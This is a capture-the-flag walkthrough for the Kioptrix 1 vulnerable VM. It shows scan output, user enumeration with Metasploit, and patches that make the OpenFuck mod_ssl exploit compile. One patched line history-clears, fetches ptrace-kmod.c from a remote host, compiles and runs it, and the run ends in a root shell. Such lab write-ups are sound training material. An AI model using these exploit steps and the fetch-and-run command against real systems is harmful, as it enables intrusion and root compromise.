Kioptrix 1

Source

Setting up the challenge

Download VMWare Workstation and the vulnerable VM, start it.

Scanning with nmap

Finding the vulnerable machine

nmap 10.0.1.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 20:02 CET
Nmap scan report for 10.0.1.104
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 00:0C:29:BE:28:85 (VMware)

The address is 10.0.1.104.

In depth scan

nmap -A 10.0.1.104


Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-17 15:15 CET
Nmap scan report for 10.0.1.104
Host is up (0.00047s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32768/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: HMYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-02-16T22:42:12+00:00; -15h34m01s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:BE:28:85 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: -15h34m01s, deviation: 0s, median: -15h34m01s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.47 ms 10.0.1.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.87 seconds

Conclusion

Characteristic Value
Operating System Running: Linux 2.4.X OS CPE:
Kernel cpe:/o:linux:linux_kernel:2.4
OS details Linux 2.4.9 - 2.4.18 (likely embedded)
Samba 139/tcp open netbios-ssn Samba smbd (workgroup: HMYGROUP)
SSH OpenSSH 2.9p2 (protocol 1.99)
Apache Apache/1.3.20 (Unix)

Scanning with dirb

Used to find hidden pages by scanning for common paths.

dirb http://10.0.1.104/ /usr/share/wordlists/dirb/common.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Feb 17 21:49:39 2018
URL_BASE: http://10.0.1.104/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.1.104/ ----
+ http://10.0.1.104/~operator (CODE:403|SIZE:273)                                                                                          
+ http://10.0.1.104/~root (CODE:403|SIZE:269)                                                                                              
+ http://10.0.1.104/cgi-bin/ (CODE:403|SIZE:272)                                                                                           
+ http://10.0.1.104/index.html (CODE:200|SIZE:2890)                                                                                        
==> DIRECTORY: http://10.0.1.104/manual/                                                                                                   
==> DIRECTORY: http://10.0.1.104/mrtg/                                                                                                     
==> DIRECTORY: http://10.0.1.104/usage/                                                                                                    

---- Entering directory: http://10.0.1.104/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.0.1.104/mrtg/ ----
+ http://10.0.1.104/mrtg/index.html (CODE:200|SIZE:17318)                                                                                  

---- Entering directory: http://10.0.1.104/usage/ ----
+ http://10.0.1.104/usage/index.html (CODE:200|SIZE:3704)                                                                                  

-----------------
END_TIME: Sat Feb 17 21:50:04 2018
DOWNLOADED: 13836 - FOUND: 6

Found :

Type Address Response code Response size
File http://10.0.1.104/~operator 403 273
File http://10.0.1.104/~root 403 269
File http://10.0.1.104/cgi-bin/ 403 272
File http://10.0.1.104/index.html 200 2890
DIRECTORY http://10.0.1.104/manual/    
DIRECTORY http://10.0.1.104/mrtg/    
DIRECTORY http://10.0.1.104/usage/    

Conclusion

There seems to be the users root and operator.

Scanning with OpenVAS

Install OpenVAS and use it to scan the address.

NVT Name Port Port Protocol CVSS Severity CVEs
Webalizer Cross Site Scripting Vulnerability 443 tcp 7.5 High CVE-2001-0835
Webalizer Cross Site Scripting Vulnerability 80 tcp 7.5 High CVE-2001-0835
http TRACE XSS attack 443 tcp 5.8 Medium CVE-2004-2320, CVE-2003-1567
http TRACE XSS attack 80 tcp 5.8 Medium CVE-2004-2320, CVE-2003-1567
SSL/TLS: Certificate Expired 443 tcp 5 Medium NOCVE
SSL/TLS: Report Vulnerable Cipher Suites for HTTPS 443 tcp 5 Medium CVE-2016-2183, CVE-2016-6329
Apache UserDir Sensitive Information Disclosure 443 tcp 5 Medium CVE-2001-1013
Apache UserDir Sensitive Information Disclosure 80 tcp 5 Medium CVE-2001-1013
SSL/TLS: Untrusted Certificate Authorities 443 tcp 5 Medium NOCVE
Apache Web Server ETag Header Information Disclosure Weakness 443 tcp 4.3 Medium CVE-2003-1418
Apache Web Server ETag Header Information Disclosure Weakness 80 tcp 4.3 Medium CVE-2003-1418
SSL/TLS: DHE_EXPORT Man in the Middle Security Bypass Vulnerability (LogJam) 443 tcp 4.3 Medium CVE-2015-4000
SSL/TLS: SSLv3 Protocol CBC Cipher Suites Information Disclosure Vulnerability (POODLE) 443 tcp 4.3 Medium CVE-2014-3566
SSL/TLS: Report Weak Cipher Suites 443 tcp 4.3 Medium CVE-2013-2566, CVE-2015-2808, CVE-2015-4000
SSH Weak Encryption Algorithms Supported 22 tcp 4.3 Medium NOCVE
SSL/TLS: RSA Temporary Key Handling RSA_EXPORT Downgrade Issue (FREAK) 443 tcp 4.3 Medium CVE-2015-0204
SSL/TLS: Deprecated SSLv2 and SSLv3 Protocol Detection 443 tcp 4.3 Medium CVE-2016-0800, CVE-2014-3566
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability 443 tcp 4.3 Medium CVE-2012-0053
Apache HTTP Server httpOnly Cookie Information Disclosure Vulnerability 80 tcp 4.3 Medium CVE-2012-0053
SSL/TLS: Diffie-Hellman Key Exchange Insufficient DH Group Strength Vulnerability 443 tcp 4 Medium NOCVE
TCP timestamps     2.6 Low NOCVE
SSH Weak MAC Algorithms Supported 22 tcp 2.6 Low NOCVE

Scanning with nikto

Download or update nikto from GitHub.

./nikto.pl -h  10.0.1.104 -Format csv -o ~/Vulnhub/Kioptrix_1/nikto.csv
Port OSVDB GET/POST Path Description
80       Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
80 OSVDB-0 GET / Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 05:12:46 2001
80 OSVDB-0 GET / The anti-clickjacking X-Frame-Options header is not present.
80 OSVDB-0 GET / The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
80 OSVDB-0 GET / The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
80 OSVDB-27487 GET / Apache is vulnerable to XSS via the Expect header
80 OSVDB-0 OPTIONS / Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
80 OSVDB-877 TRACE / HTTP TRACE method is active, suggesting the host is vulnerable to XST
80 OSVDB-0 GET ///etc/hosts The server install allows reading of any system file by adding an extra ‘/’ to the URL.
80 OSVDB-682 GET /usage/ Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02.
80 OSVDB-3268 GET /manual/ Directory indexing found.
80 OSVDB-3092 GET /manual/ Web server manual found.
80 OSVDB-3268 GET /icons/ Directory indexing found.
80 OSVDB-3233 GET /icons/README Apache default file found.
80 OSVDB-3092 GET /test.php This might be interesting…

Additionnally the following information is being given:

mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Apache UserDir Sensitive Information Disclosure

The vulnerability listed in OpenVAS is listed as CVE-2001-1013.

Apache on Red Hat Linux with with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.

We open msfconsole to search if there are any exploits available :

msfconsole
msf>search CVE-2001-1013

Matching Modules
================

   Name                                        Disclosure Date  Rank    Description
   ----                                        ---------------  ----    -----------
   auxiliary/scanner/http/apache_userdir_enum                   normal  Apache "mod_userdir" User Enumeration

We use the exploit available

msf> use auxiliary/scanner/http/apache_userdir_enum
msf> show options
msf> set RHOSTS
msf> run
[+] http://10.0.1.104/ - Users found: operator, postgres, root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Conclusion

The system has the users : operator, postgres and root.

mod_ssl buffer overflow

Source : Hypn.za.net One of the popular boot-to-root VMs has an exploit (764.c) which doesn’t compile so well in modern Kali, producing the errors:

764d.c:643:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764d.c:651:2: error: unknown type name ‘RC4_KEY’
764d.c:652:2: error: unknown type name ‘RC4_KEY’
764d.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:845:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764d.c:882:2: error: unknown type name ‘MD5_CTX’
764d.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:977:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764d.c:1069:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764d.c:1106:2: error: unknown type name ‘MD5_CTX’
764d.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764d.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764d.c:1127:31: error: expected expression before ‘)’ token
764d.c:1131:32: error: expected expression before ‘)’ token
764d.c:1146:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764d.c:1158:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764d.c:1171:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

Luckily there was a blog post written in 2014 by @paulwebsec explaining how to update the exploit, which fixes some of them but still leaves you with:

764b.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
764b.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
764b.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
764b.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
764b.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
764b.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
764b.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)

On Kali (and likely other Debian based distros) you can work around this by simply doing an “apt-get install libssl1.0-dev” to roll back your libssl-dev version, but why don’t we get this compiling with the modern lib…

Then changes to make (including Paul’s) are:

1) Add this below line 24 (the last #include):

#include <openssl/rc4.h>
#include <openssl/md5.h>

#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16

2) Replace “COMMAND2” on (now) line 672:

#define COMMAND2 “unset HISTFILE; cd /tmp; wget https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; \n”

3) Add “const” to the beginning of (now) line 970:

const unsigned char *p, *end;

4) Replace the “if” on (now) line 1078 with:

if (EVP_PKEY_get1_RSA(pkey) == NULL) {
  ...}

5) Replace the “encrypted_key_length” code on (now) line 1084 with:

encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);

6) Install “libssl-dev” (if not already installed):

apt–get install libssl–dev

7) Compile!

gcc -o 764 764.c -lcrypto

Exploiting the overflow

We display the usage with ./764

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./764 target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)


  Supported OffSet:
	0x00 - Caldera OpenLinux (apache-1.3.26)
	0x01 - Cobalt Sun 6.0 (apache-1.3.12)
  ...
  0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
  0x0d - Debian GNU Linux (apache_1.3.19-1)
  0x0e - Debian GNU Linux (apache_1.3.22-2)

From the information gathered we exploit the vulnerability with :

./764 0x6b 10.0.1.104 443
Output
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--22:08:06--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   1.87 MB/s

22:08:07 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 8110
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

From there we have now have a remote shell with root access !